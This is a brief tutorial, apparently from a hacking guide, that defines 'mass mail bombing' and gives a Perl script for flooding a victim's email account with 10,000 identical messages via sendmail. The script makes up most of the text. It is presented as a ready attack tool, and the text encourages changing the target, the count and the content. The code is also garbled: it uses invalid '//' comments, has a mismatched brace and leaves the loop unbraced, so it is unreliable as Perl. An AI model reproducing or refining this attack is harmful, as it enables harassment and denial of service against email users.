Mass MailBombing

It is the mail bombing attack wherein the attack flood  the victim's e-mail account with extremely large number of copies of the same Email

perl script for mass mail bombing

$mprogram= '/usr/lib/sendmail';                                          //path of the email demon 
$victim= '';                                    // Victim's email address
$var=0;                                                                                  //start count from 0

while($var<10000)                                                              //count till number of email to be sent 

open(MAIL, "|$mprogram $victim"}||die "can't open mail program\n";
print MAIL "MAIL Bomb" ;                                                  //Enter E-mail counts here and send e-mail
sleep(5);                                                                               // wait for some time 
$var++;                                                                                  //increase count by 1

 this perl script will send 10000 copies of the same email message to the victim ( is important to note here that the above piece of code can easily to be modified to change the number of copies to send ,the victims or the content of mailbomb.